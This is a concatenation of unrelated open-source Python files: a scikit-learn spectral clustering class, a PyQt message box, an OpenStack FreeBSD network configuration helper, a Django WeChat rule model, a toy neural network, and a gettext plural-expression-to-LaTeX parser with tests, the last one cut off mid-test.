http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
- A Tutorial on Spectral Clustering, 2007
Ulrike von Luxburg
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- Multiclass spectral clustering, 2003
Stella X. Yu, Jianbo Shi
http://www1.icsi.berkeley.edu/~stellayu/publication/doc/2003kwayICCV.pdf
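Examples
--------
A minimal usage sketch (added for illustration; the data values are
assumptions, not taken from the original file):
>>> import numpy as np
>>> X = np.array([[0., 0.], [0., 1.], [10., 10.], [10., 11.]])
>>> sc = SpectralClustering(n_clusters=2, affinity='rbf').fit(X)
>>> sc.labels_.shape
(4,)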
"""
def __init__(self, n_clusters=8, eigen_solver=None, random_state=None,
n_init=10, gamma=1., affinity='rbf', n_neighbors=10, k=None,
eigen_tol=0.0, assign_labels='kmeans', mode=None):
if k is not None:
warnings.warn("'k' was renamed to n_clusters and "
"will be removed in 0.15.",
DeprecationWarning)
n_clusters = k
if mode is not None:
warnings.warn("'mode' was renamed to eigen_solver and "
"will be removed in 0.15.",
DeprecationWarning)
eigen_solver = mode
self.n_clusters = n_clusters
self.eigen_solver = eigen_solver
self.random_state = random_state
self.n_init = n_init
self.gamma = gamma
self.affinity = affinity
self.n_neighbors = n_neighbors
self.eigen_tol = eigen_tol
self.assign_labels = assign_labels
def fit(self, X):
"""Creates an affinity matrix for X using the selected affinity,
then applies spectral clustering to this affinity matrix.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
OR, if ``affinity='precomputed'``, a precomputed affinity
matrix of shape (n_samples, n_samples)
"""
if X.shape[0] == X.shape[1] and self.affinity != "precomputed":
warnings.warn("The spectral clustering API has changed. ``fit`` "
"now constructs an affinity matrix from data. To use"
" a custom affinity matrix, "
"set ``affinity='precomputed'``.")
if self.affinity == 'rbf':
self.affinity_matrix_ = rbf_kernel(X, gamma=self.gamma)
elif self.affinity == 'nearest_neighbors':
connectivity = kneighbors_graph(X, n_neighbors=self.n_neighbors)
self.affinity_matrix_ = 0.5 * (connectivity + connectivity.T)
elif self.affinity == 'precomputed':
self.affinity_matrix_ = X
else:
raise ValueError("Invalid 'affinity'. Expected 'rbf', "
"'nearest_neighbors' or 'precomputed', got '%s'."
% self.affinity)
self.random_state = check_random_state(self.random_state)
self.labels_ = spectral_clustering(self.affinity_matrix_,
n_clusters=self.n_clusters,
eigen_solver=self.eigen_solver,
random_state=self.random_state,
n_init=self.n_init,
eigen_tol=self.eigen_tol,
assign_labels=self.assign_labels)
return self
@property
def _pairwise(self):
return self.affinity == "precomputed"
| mrshu/scikit-learn | sklearn/cluster/spectral.py | Python | bsd-3-clause | 17,408 |
# -*- coding: utf-8 -*-
############################################################################
#
# Copyright (C) 2011-2014
# Christian Kohlöffel
#
# This file is part of DXF2GCODE.
#
# DXF2GCODE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DXF2GCODE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DXF2GCODE. If not, see <http://www.gnu.org/licenses/>.
#
############################################################################
"""
Special purpose canvas including all required plotting function etc.
"""
from globals.six import text_type
import globals.constants as c
if c.PYQT5notPYQT4:
from PyQt5.QtWidgets import QTextBrowser
from PyQt5 import QtCore
else:
from PyQt4.QtGui import QTextBrowser
from PyQt4 import QtCore
class MessageBox(QTextBrowser):
"""
The MessageBox Class performs the write functions in the Message Window.
The previous defined MessageBox class is used as output (Within ui).
@sideeffect: None
"""
def __init__(self, origobj):
"""
Initialization of the MessageBox class.
@param origobj: This is the reference to the parent class initialized
previously.
"""
super(MessageBox, self).__init__()
self.setOpenExternalLinks(True)
self.append(self.tr("You are using DXF2GCODE"))
self.append(self.tr("Version %s (%s)") % (c.VERSION, c.DATE))
self.append(self.tr("For more information and updates visit:"))
self.append("<a href='http://sourceforge.net/projects/dxf2gcode/'>http://sourceforge.net/projects/dxf2gcode/</a>")
def tr(self, string_to_translate):
"""
Translate a string using the QCoreApplication translation framework
@param: string_to_translate: a unicode string
@return: the translated unicode string if it was possible to translate
"""
return text_type(QtCore.QCoreApplication.translate('MessageBox',
string_to_translate))
def write(self, string):
"""
The function is called by the window logger to write
the log message to the Messagebox
@param string: The log message which will be written.
"""
stripped_string = string.strip()
if stripped_string:
self.append(stripped_string)
self.verticalScrollBar().setValue(1e9)
| Poofjunior/dxf2gcode | gui/messagebox.py | Python | gpl-3.0 | 2,949 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2011 Openstack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
FreeBSD network helper module
"""
# FreeBSD network configuration uses:
# - 1 shell-script-style global configuration file (/etc/rc.conf)
# - 1 IP per interface
# - routes are global
# - gateways are global
# - DNS is configured via resolv.conf
import os
import re
import time
import subprocess
import logging
from cStringIO import StringIO
import commands.network
RCCONF_FILE = "/etc/rc.conf"
def get_hostname():
"""
Fetch and return the VM's current hostname, if any.
Looks at the /etc/rc.conf config on a FreeBSD server.
"""
try:
with open(RCCONF_FILE) as hostname_fyl:
for line in hostname_fyl.readlines():
hn = re.search('hostname=(.*)', line)
if hn:
return hn.group(1)
return None
except Exception, e:
logging.info("Current FreeBSD hostname enquiry failed: %s" % str(e))
return None
def fetch_all_from_xendict(interfaces, keyname):
xens = interfaces.keys()
values = []
for xen in xens:
for keyval in interfaces.get(xen, []).get(keyname, []):
values.append(keyval.encode('ascii','ignore'))
if '' in values:
values.remove('')
return list(set(values))
def configure_network(hostname, interfaces):
update_files = {}
# Unset LD_LIBRARY_PATH
env = os.environ.copy()
if 'LD_LIBRARY_PATH' in env:
del env['LD_LIBRARY_PATH']
# Generate new /etc/rc.conf
data = _get_file_data(interfaces, hostname)
update_files[RCCONF_FILE] = data
# Generate new /etc/resolv.conf file
# Uses resolvconf utility if present else creates /etc/resolv.conf
nameservers = fetch_all_from_xendict(interfaces, 'dns')
if not commands.network.update_resolvconf(nameservers):
filepath, data = commands.network.get_resolv_conf(interfaces)
if data:
update_files[filepath] = data
# Generate new /etc/hosts file
filepath, data = commands.network.get_etc_hosts(interfaces, hostname)
update_files[filepath] = data
# Write out new files
commands.network.update_files(update_files)
pipe = subprocess.PIPE
# Set hostname
try:
commands.network.sethostname(hostname)
except Exception, e:
logging.error("Couldn't sethostname(): %s" % str(e))
return (500, "Couldn't set hostname: %s" % str(e))
# Restart network
logging.debug('executing /etc/rc.d/netif restart')
p = subprocess.Popen(["/bin/sh", "/etc/rc.d/netif", "restart"],
stdin=pipe, stdout=pipe, stderr=pipe, env=env)
logging.debug('waiting on pid %d' % p.pid)
status = os.waitpid(p.pid, 0)[1]
logging.debug('status = %d' % status)
if status != 0:
return (500, "Couldn't restart IPv4 networking: %d" % status)
# Restart network
if os.path.exists("/etc/rc.d/network_ipv6"):
logging.debug('executing /etc/rc.d/network_ipv6 restart')
p = subprocess.Popen(["/etc/rc.d/network_ipv6", "restart"],
stdin=pipe, stdout=pipe, stderr=pipe, env={})
logging.debug('waiting on pid %d' % p.pid)
status = os.waitpid(p.pid, 0)[1]
logging.debug('status = %d' % status)
if status != 0:
return (500, "Couldn't restart IPv6 networking: %d" % status)
# Restart routing
logging.debug('executing /etc/rc.d/routing restart')
p = subprocess.Popen(["/bin/sh", "/etc/rc.d/routing", "restart"],
stdin=pipe, stdout=pipe, stderr=pipe, env=env)
logging.debug('waiting on pid %d' % p.pid)
status = os.waitpid(p.pid, 0)[1]
logging.debug('status = %d' % status)
#if status != 0:
# return (500, "Couldn't restart network routing: %d" % status)
return (0, "")
def _create_rcconf_file(infile, interfaces, hostname):
"""
Return new rc.conf, merging in 'infile'
"""
ipv6_interfaces = []
static_route_entries = []
outfile = StringIO()
for line in infile:
line = line.strip()
if line.startswith("ifconfig") or \
line.startswith("defaultrouter") or \
line.startswith("ipv6_ifconfig") or \
line.startswith("ipv6_defaultrouter") or \
line.startswith("ipv6_enable") or \
line.startswith("static_routes") or \
line.startswith("route_") or \
line.startswith("dhcpd_") or \
line.startswith("hostname"):
continue
print >> outfile, line
print >> outfile, 'dhcpd_enable="NO"'
print >> outfile, 'hostname=%s' % hostname
gateway4, gateway6 = commands.network.get_gateways(interfaces)
ifnames = interfaces.keys()
ifnames.sort()
for ifname_prefix in ifnames:
interface = interfaces[ifname_prefix]
label = interface.get('label')
ip4s = interface['ip4s']
ip6s = interface['ip6s']
if ip6s:
ipv6_interfaces.append(ifname_prefix)
ifname_suffix_num = 0
for ip4, ip6 in map(None, ip4s, ip6s):
if ifname_suffix_num:
ifname = "%s_alias%d" % (ifname_prefix, ifname_suffix_num - 1)
else:
ifname = ifname_prefix
if label:
print >>outfile, '# Label %s' % label
if ip4:
if ifname_suffix_num:
# XXX -- Known bug here. If we're adding an alias
# that is on the same network as another address already
# configured, the netmask here should be 255.255.255.255
print >> outfile, 'ifconfig_%s="%s netmask %s"' % \
(ifname, ip4['address'], ip4['netmask'])
else:
print >> outfile, 'ifconfig_%s="%s netmask %s up"' % \
(ifname, ip4['address'], ip4['netmask'])
if ip6:
print >> outfile, 'ipv6_ifconfig_%s="%s/%s"' % \
(ifname, ip6['address'], ip6['prefixlen'])
ifname_suffix_num += 1
for route in interface['routes']:
if route['network'] == '0.0.0.0' and \
route['netmask'] == '0.0.0.0' and \
route['gateway'] == gateway4:
continue
if ':' in route['network']:
# ipv6
fmt = '-net %(network)s/%(netmask)s %(gateway)s'
else:
fmt = '-net %(network)s -netmask %(netmask)s %(gateway)s'
static_route_entries.append(fmt % route)
if static_route_entries:
names = []
for i, line in enumerate(static_route_entries):
name = 'lan%d' % i
names.append(name)
print >> outfile, 'route_%s="%s"' % (name, line)
print >> outfile, 'static_routes="%s"' % ' '.join(names)
if ipv6_interfaces:
print >> outfile, 'ipv6_enable="YES"'
print >> outfile, 'ipv6_network_interfaces="%s"' % \
','.join(ipv6_interfaces)
if gateway4:
print >> outfile, 'defaultrouter="%s"' % gateway4
if gateway6:
print >> outfile, 'ipv6_defaultrouter="%s%%%s"' % \
(gateway6, 'xn0')
outfile.seek(0)
return outfile.read()
def _get_file_data(interfaces, hostname):
"""
Return the data for a new rc.conf file
"""
return _create_rcconf_file(open(RCCONF_FILE), interfaces, hostname)
| rackerlabs/openstack-guest-agents-unix | commands/freebsd/network.py | Python | apache-2.0 | 8,163 |
# -*- coding: utf-8 -*-
import logging
from django.db import models
from system.official_account.models import OfficialAccount
from system.rule.models import Rule
logger_rule_match = logging.getLogger(__name__)
class RuleMatchManager(models.Manager):
"""
Manager for the WeChat rule reply table
"""
def add(self, rule, plugin_iden, reply_id=0, order=0, status=True):
"""
Add a WeChat rule reply
"""
rule_match = super(RuleMatchManager, self).create(
official_account=rule.official_account,
rule=rule,
plugin_iden=plugin_iden,
reply_id=reply_id,
order=order,
status=status
)
logger_rule_match.info('New rule_match created [Detail] %s' % rule_match.__dict__)
return rule_match
def get(self, rule):
"""
Return the QuerySet corresponding to the given rule.
The returned set is already sorted by priority, with disabled matches removed.
"""
return super(RuleMatchManager, self).get_queryset().filter(
official_account=rule.official_account
).filter(
rule=rule
).filter(
status=True
).order_by(
'-order', 'id'
)
def get_news(self, news_id):
"""
Return all news (rich-media) matches in the table for the given news_id.
:param news_id: news reply ID
"""
return super(RuleMatchManager, self).get_queryset().filter(
plugin_iden='news'
).filter(
reply_id=news_id
)
class RuleMatch(models.Model):
"""
WeChat rule match table
"""
official_account = models.ForeignKey(OfficialAccount, verbose_name=u'所属公众号')
rule = models.ForeignKey(Rule, verbose_name=u'所属规则')
plugin_iden = models.CharField(u'响应插件标识符', max_length=50)
reply_id = models.PositiveIntegerField(u'响应ID号', default=0)
order = models.PositiveIntegerField(u'优先级', default=0)
status = models.BooleanField(u'是否启用', default=True)
objects = models.Manager()
manager = RuleMatchManager()
class Meta:
verbose_name = u'微信规则匹配表'
verbose_name_plural = u'微信规则匹配表'
db_table = 'wechat_rule_match'
def __unicode__(self):
return self.plugin_iden
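# Usage sketch (added for illustration; the rule object and values are
# assumptions, not from the original module):
#
#   match = RuleMatch.manager.add(rule, plugin_iden='text', reply_id=12, order=10)
#   matches = RuleMatch.manager.get(rule)  # enabled matches, highest priority first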
| doraemonext/wechat-platform | wechat_platform/system/rule_match/models.py | Python | bsd-2-clause | 2,385 |
# net.py
# A dead-simple neural network
#
# Potential improvements:
# - Support topologies other than 1 hidden layer
# - Add other training strategies (adaptive learning rate, momentum)
# - Add more error checking
import numpy as np
class Net(object):
"""
Neural network class with:
- 1 hidden layer
- Arbitrary number of neurons in each layer
- Sigmoid activation function f(x) = 1 / (1 + exp(-x))
- Bias nodes in input/hidden layers
- Gradient descent training
:Parameters:
inp_range: list (num_inputs x 2)
List of input ranges
Input values are scaled so that (min -> -1) and (max -> +1)
hidden_count: int
Number of neurons in the hidden layer
output_count: int
Number of neurons in the output layer (= number of output signals)
:Internals:
size_inp, size_hid, size_out: ints
Number of neurons in input, hidden, and output layers
w_in: 2D array
Connections between input and hidden, so that
hidden = activate(w_in * input)
w_out: 2D array
Connections between hidden and output, so that
output = w_out * hidden
:Example:
# Two inputs (ranges [1,2] and [3,4])
# One hidden layer (2 neurons)
# One output layer (1 neuron)
net = Net([[1, 2], [3, 4]], 2, 1)
"""
def __init__(self, inp_range, hidden_count, output_count):
# Make sure input matrix is Nx2 (ie: min + max for each)
try:
assert np.shape(inp_range)[1] == 2
except:
raise ValueError("Invalid shape for inp_range - need [min, max] for each node")
# Size of each layer
self.size_inp = np.shape(inp_range)[0]
self.size_hid = hidden_count
self.size_out = output_count
# Input ranges
self.inp_range = np.array(inp_range)
self.inp_min = np.reshape(self.inp_range[:, 0], [self.size_inp, -1])
self.inp_max = np.reshape(self.inp_range[:, 1], [self.size_inp, -1])
self.inp_span = self.inp_max - self.inp_min
# Random connections
self.w_in = np.random.random([self.size_hid, self.size_inp+1])-0.5
self.w_out = np.random.random([self.size_out, self.size_hid+1])-0.5
def _activate(self, layer):
"""
Perform the activation function on each neuron in the layer
Used on hidden layers
"""
return np.array([1 / (1 + np.exp(-x)) for x in layer])
def _addBias(self, layer):
"""
Add a bias node to the current layer
(ie: a neuron that always outputs 1)
"""
return np.vstack((layer, [1]))
def _scaleInput(self, input):
"""
Scale the input values such that:
Input | Output
--------------+--------
min | -1
(min+max)/2 | 0
max | +1
:Inputs:
input: 1D list of length size_inp
:Returns:
1D list of same length, with all values scaled (as described)
"""
# Shift/scale to [0, 1], then map linearly onto [-1, +1] as documented
input -= self.inp_min
input /= self.inp_span
return input * 2 - 1
def _forwardProp(self, input):
"""
Perform forward propagation, saving the values at each layer
:Inputs:
input: a (size_inp x 1) array
:Returns:
A list of 3 1D arrays of length (size_inp, size_hid, size_out)
Calculated values at each node in all 3 layers
"""
# Save intermediate results
o = []
# Input
layer = np.array(input, copy=True)
layer = np.reshape(layer, [-1, 1])
layer = self._scaleInput(layer)
layer = self._addBias(layer)
o.append(layer)
# Hidden
layer = self._activate(np.dot(self.w_in, layer))
layer = self._addBias(layer)
o.append(layer)
# Output
layer = np.dot(self.w_out, layer)
o.append(layer)
return o
def _backProp(self, o, target):
"""
Perform backward propagation, calculating deltas at each node
:Inputs:
o: list of 3 arrays (1 x size_inp, 1 x size_hid, 1 x size_out)
Output values at each node
target: (1 x size_out) array of
Expected values at output layer
:Returns:
List of 2 arrays (1 x size_hid, 1 x size_out)
Delta_j values at each node in hidden and output layers
"""
delta = [[] for _ in range(2)]
delta[0] = np.zeros([self.size_hid, 1])
# Output delta
delta[1] = o[2] - np.reshape(target, [-1, 1])
# Hidden delta
for j in range(self.size_hid):
for k in range(self.size_out):
delta[0][j] += delta[1][k] * self.w_out[k][j]
delta[0][j] *= o[1][j] * (1 - o[1][j])
return delta
def sim(self, input):
"""
Find the output values, given a set of input values
:Inputs:
input: a 1D array of length size_inp
:Returns:
A 1D array of length size_out
"""
# Make sure the input is the right size
try:
size = np.shape(input)[0]
assert size == self.size_inp
except:
raise ValueError("Expected input of size {}; got {}".format(self.size_inp, size))
# We only need to do forward propagation
input = np.reshape(np.array(input), [-1, 1])
return self._forwardProp(input)[2]
def train_1(self, input, target, lr):
"""
Perform forward propagation to get the output values,
then backward propagation to update the weights
Repeat for a number of tests
:Inputs:
input: 2D array
A <tests>x<size_inp> array. The input for test i is input[i, :]
target: 2D array
A <tests>x<size_out> array. The target for test i is target[i, :]
lr: float
Learning rate - preferably in the range (0, 1)
:Returns:
The error (SSE) accumulated over all of the inputs
"""
# Make sure the input is the right size
try:
size = np.shape(input)[1]
assert size == self.size_inp
except:
raise ValueError("Expected input of size {}; got {}".format(self.size_inp, size))
# Keep track of total error in tests
error = 0
# Optional: reorder test cases randomly (does this help?)
order = range(len(input))
np.random.shuffle(order)
for i in order:
# Forward propagation
o = self._forwardProp(input[i])
# Backward propagation
delta = self._backProp(o, target[i, :])
# Update weights
delta_w_out = -lr * np.dot(delta[1], np.reshape(o[1], [1, -1]))
delta_w_in = -lr * np.dot(delta[0], np.reshape(o[0], [1, -1]))
self.w_out += delta_w_out
self.w_in += delta_w_in
# Add this error to running total
error += np.sum((o[2] - np.reshape(target[i], [-1, 1]))**2)
return error
def train_many(self, input, target, lr, epochs, goal, verbose=False):
"""
Train on the same data set multiple times,
Stop as soon as target accuracy or max epochs are reached.
:Inputs:
input: 2D array
A <tests>x<size_inp> array. The input for test i is input[i, :]
target: 2D array
A <tests>x<size_out> array. The target for test i is target[i, :]
lr: float
Learning rate - preferably in the range (0, 1)
epochs: int
Maximum number of training iterations
goal: float
Target accuracy.
verbose: boolean
If true, print error at each epoch
:Returns:
A list of the error at each epoch
"""
error = []
for i in range(epochs):
nextError = self.train_1(input, target, lr)
if verbose:
print "{}: {}".format(i+1, nextError)
error.append(nextError)
if nextError < goal:
break
return error
def main():
"""
Test code: learn XOR with 3 hidden nodes
"""
# Set up neural net
net = Net([[0, 1], [0, 1]], 3, 1)
# Set up dataset
input = np.array([[0, 0], [0, 1], [1, 0], [1, 1]]*20)
target = np.array([[0], [1], [1], [0] ]*20)
# Print it to check
#print input
#print target
# Train for 100 epochs
error = net.train_many(input, target, 0.4, 100, 0.01)
#print "\n".join(map(str, error))
# Check that we've learned everything
print net.sim([0, 0]) # 0
print net.sim([0, 1]) # 1
print net.sim([1, 0]) # 1
print net.sim([1, 1]) # 0
#print net.sim([1, 1, 1]) # ValueError()
if __name__ == "__main__":
main()
| gregdeon/simple-ann | src/net.py | Python | mit | 9,516 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import subprocess
import sys
import unittest
COMMAND_PREFIX = 'gettextmath'
def generate_command_call(name, prefix, *args):
return '\\' + prefix + name + '{' + '}{'.join(args) + '}'
class Parser:
class Token:
function = False
def process(self, stack, output):
output.append(self)
def consume(self, stack):
stack.append(self)
def __repr__(self):
return str(self)
class Number(Token):
def __init__(self, number):
self.number = int(number)
def generate(self):
return str(self.number)
def __eq__(self, other):
return isinstance(other, Parser.Number) and self.number == other.number
def __str__(self):
return 'Number({})'.format(self.number)
class Identifier(Token):
def __init__(self, identifier):
self.identifier = identifier
def generate(self):
return self.identifier
def __eq__(self, other):
return isinstance(other, Parser.Identifier) and self.identifier == other.identifier
def __str__(self):
return 'Identifier("{}")'.format(self.identifier)
class Operator(Token):
function = True
def __init__(self, operation):
self.operation = operation
def process(self, stack, output):
while len(stack) > 0 and stack[len(stack)-1].priority < self.priority:
output.append(stack.pop())
stack.append(self)
def __eq__(self, other):
return type(self) == type(other) and self.operation == other.operation
def __str__(self):
return 'Operator("{}")'.format(self.operation)
class BinaryOperator(Operator):
def consume(self, stack):
self.arg2 = stack.pop()
self.arg1 = stack.pop()
stack.append(self)
def generate(self):
return generate_command_call(self.command, COMMAND_PREFIX, self.arg1.generate(), self.arg2.generate())
class OperatorEqual(BinaryOperator):
priority = 7
command = 'equal'
class OperatorNotEqual(BinaryOperator):
priority = 7
command = 'notequal'
class OperatorGreaterEqual(BinaryOperator):
priority = 6
command = 'greaterequal'
class OperatorLesserEqual(BinaryOperator):
priority = 6
command = 'lesserequal'
class OperatorGreaterThan(BinaryOperator):
priority = 6
command = 'greaterthan'
class OperatorLesserThan(BinaryOperator):
priority = 6
command = 'lesserthan'
class OperatorAnd(BinaryOperator):
priority = 11
command = 'and'
class OperatorOr(BinaryOperator):
priority = 12
command = 'or'
class OperatorModulo(BinaryOperator):
priority = 3
command = 'modulo'
class OperatorTernaryStart(Operator):
priority = 100
function = False
def consume(self, stack):
self.arg_truefalse = stack.pop()
self.arg_condition = stack.pop()
if not isinstance(self.arg_truefalse, Parser.OperatorTernaryMiddle):
raise Exception('Operator "?" must have matching ":", but "{}" found'.format(self.arg_truefalse))
stack.append(self)
def generate(self):
return generate_command_call('ifthenelse', COMMAND_PREFIX, self.arg_condition.generate(), self.arg_truefalse.true.generate(), self.arg_truefalse.false.generate())
class OperatorTernaryMiddle(Operator):
priority = 100
function = False
def consume(self, stack):
self.false = stack.pop()
self.true = stack.pop()
stack.append(self)
class OpenParenthesis(Token):
priority = 100
def process(self, stack, output):
stack.append(self)
def __str__(self):
return 'OpenParenthesis'
class CloseParenthesis(Token):
priority = 100
def process(self, stack, output):
while len(stack) > 0 and not isinstance(stack[-1], Parser.OpenParenthesis):
x = stack.pop()
output.append(x)
open_paren = stack.pop()
if not isinstance(open_paren, Parser.OpenParenthesis):
raise Exception('Could not find matching left parenthesis')
if len(stack) > 0 and stack[-1].function:
output.append(stack.pop())
def __str__(self):
return 'CloseParenthesis'
tokens = [
# boolean operations
(re.compile(r'^(==)'), OperatorEqual),
(re.compile(r'^(!=)'), OperatorNotEqual),
(re.compile(r'^(>=)'), OperatorGreaterEqual),
(re.compile(r'^(<=)'), OperatorLesserEqual),
(re.compile(r'^(>)'), OperatorGreaterThan),
(re.compile(r'^(<)'), OperatorLesserThan),
(re.compile(r'^(&&)'), OperatorAnd),
(re.compile(r'^(\|\|)'), OperatorOr),
(re.compile(r'^(\?)'), OperatorTernaryStart),
(re.compile(r'^(:)'), OperatorTernaryMiddle),
# arithmetic operations
(re.compile(r'^(%)'), OperatorModulo),
# parenthesis
(re.compile(r'^\('), OpenParenthesis),
(re.compile(r'^\)'), CloseParenthesis),
# others
(re.compile(r'^([0-9]+)'), Number),
(re.compile(r'^([_A-Za-z][_A-Za-z0-9]*)'), Identifier),
(re.compile(r'^\s+'), None),
]
def __init__(self, source):
self.source = source
self.overriden_identifiers = {}
def override_identifier(self, old_identifier, new_identifier):
self.overriden_identifiers[old_identifier] = new_identifier
def parse(self):
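# Tokenise the source and run the shunting-yard algorithm: operands go
# straight to `output`; an incoming operator first flushes any stacked
# operator that binds tighter (lower priority number) before being pushed.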
source = self.source
output = []
stack = []
while len(source) > 0:
for i in self.tokens:
m = i[0].match(source)
if m:
break
if not m:
raise Exception('No token matches "{}<...>"'.format(source[:10]))
source = source[len(m.group(0)):]
token = i[1]
if not token:
continue
args = m.groups()
token = token(*args)
token.process(stack, output)
while len(stack) > 0:
output.append(stack.pop())
o = []
for i in output:
if isinstance(i, Parser.Identifier):
o.append(Parser.Identifier(self.overriden_identifiers.get(i.identifier, i.identifier)))
else:
o.append(i)
output = o
return output
class Generator:
def __init__(self, queue):
self.queue = queue
def generate(self):
stack = []
for i in self.queue:
i.consume(stack)
if len(stack) != 1:
raise Exception('RPN processing problem, stack size is not 1 ({})'.format(repr(stack)))
r = stack[0]
r = r.generate()
return r
def generate_command(name, source, new_command=True):
s = '\\newcommand' if new_command else '\\renewcommand'
s += '{'+name+'}[1]{'
parser = Parser(source)
parser.override_identifier('n', '#1')
s += Generator(parser.parse()).generate()
s += '}'
return s
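# Minimal usage sketch (output worked out by hand from the classes above;
# '\plural' is a hypothetical command name):
#   >>> print(generate_command('\\plural', 'n != 1'))
#   \newcommand{\plural}[1]{\gettextmathnotequal{#1}{1}}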
class TestMath(unittest.TestCase):
def test_parser(self):
exprs = [(
'0',
[Parser.Number(0),]
),(
'1',
[Parser.Number(1),]
),(
'01',
[Parser.Number(1),]
),(
'0 1',
[Parser.Number(0), Parser.Number(1)]
),(
'0 == 1',
[Parser.Number(0), Parser.Number(1), Parser.OperatorEqual('==')]
),(
'0%2 == 1',
[
Parser.Number(0),
Parser.Number(2),
Parser.OperatorModulo('%'),
Parser.Number(1),
Parser.OperatorEqual('==')
]
),(
'0 == 1%2',
[
Parser.Number(0),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorModulo('%'),
Parser.OperatorEqual('==')
]
),(
'0 ? 1 : 2',
[
Parser.Number(0),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'3 ? 4 : 5 ? 1 : 2',
[
Parser.Number(3),
Parser.Number(4),
Parser.Number(5),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'3%6 ? 4%7 : 5%8 ? 1%9 : 2%10',
[
Parser.Number(3),
Parser.Number(6),
Parser.OperatorModulo('%'),
Parser.Number(4),
Parser.Number(7),
Parser.OperatorModulo('%'),
Parser.Number(5),
Parser.Number(8),
Parser.OperatorModulo('%'),
Parser.Number(1),
Parser.Number(9),
Parser.OperatorModulo('%'),
Parser.Number(2),
Parser.Number(10),
Parser.OperatorModulo('%'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'n?0:a?1:2',
[
Parser.Identifier('n'),
Parser.Number(0),
Parser.Identifier('a'),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'n?0:(a)?1:2',
[
Parser.Identifier('n'),
Parser.Number(0),
Parser.Identifier('a'),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
),(
'n==1 ? 0 : (a || b) ? 1 : 2',
[
Parser.Identifier('n'),
Parser.Number(1),
Parser.OperatorEqual('=='),
Parser.Number(0),
Parser.Identifier('a'),
Parser.Identifier('b'),
Parser.OperatorOr('||'),
Parser.Number(1),
Parser.Number(2),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?'),
Parser.OperatorTernaryMiddle(':'),
Parser.OperatorTernaryStart('?')
]
)]
for i in exprs:
parser = Parser(i[0])
self.assertEqual(i[1], parser.parse(), 'expression parsed incorrectly: "{}"'.format(i[0]))
def test_calculations(self):
functions = [(
'0',
lambda n: 0
),(
'n != 1',
lambda n: int(n != 1)
),(
'n>1',
lambda n: int(n > 1)
),(
'n>1 ? 1 : 0',
lambda n: 1 if n > 1 else 0
),(
'n==0 ? 10 : n==1 ? 11 : 12',
lambda n: 10 if n == 0 else (11 if n == 1 else 12)
),(
'n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2',
lambda n: 0 if n%10 == 1 and n%100 != 11 else (1 if n != 0 else 2)
),(
'n==1 ? 0 : n==2 ? 1 : 2',
lambda n: 0 if n == 1 else (1 if n == 2 else 2)
),(
'n==1 ? 0 : (n==0 || (n%100 > 0 && n%100 < 20)) ? 1 : 2',
lambda n: 0 if n == 1 else (1 if (n == 0 or (n%100 > 0 and n%100 < 20)) else 2)
),(
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && (n%100<10 || n%100>=20) ? 1 : 2',
lambda n: 0 if n%10 == 1 and n%100 != 11 else (1 if n%10>=2 and (n%100<10 or n%100>=20) else 2)
),(
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2',
lambda n: 0 if n%10 == 1 and n%100 != 11 else (1 if n%10>=2 and n%10<=4 and (n%100<10 or n%100>=20) else 2)
),(
'(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2',
lambda n: 0 if n == 1 else (1 if n >= 2 and n <= 4 else 2)
),(
'n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2',
lambda n: 0 if n == 1 else (1 if n%10 >= 2 and n%10 <= 4 and (n%100 < 10 or n%100 >= 20) else 2)
),(
'n%100==1 ? 0 : n%100==2 ? 1 : n%100==3 || n%100==4 ? 2 : 3',
lambda n: 0 if n%100 == 1 else (1 if n%100 == 2 else (2 if n%100 == 3 or n%100 == 4 else 3))
)]
re_text = re.compile(r'<text(.*?)>(.*?)</text>', re.DOTALL)
re_tspan = re.compile(r'</?tspan(.*?)>', re.DOTALL)
TEST_FILE_PREFIX = '_test'
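# End-to-end check: compile each expression into a \testfn macro, render it
# with latex, convert the DVI to SVG, scrape the rendered digits back out of
# the SVG text nodes, and compare against the reference Python lambda.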
for i in functions:
sys.stderr.write('*')
sys.stderr.flush()
for n in list(range(0,30))+list(range(40,300,10))+list(range(400,3000,100)):
sys.stderr.write('.')
sys.stderr.flush()
with open(TEST_FILE_PREFIX+'.tex', 'w') as f:
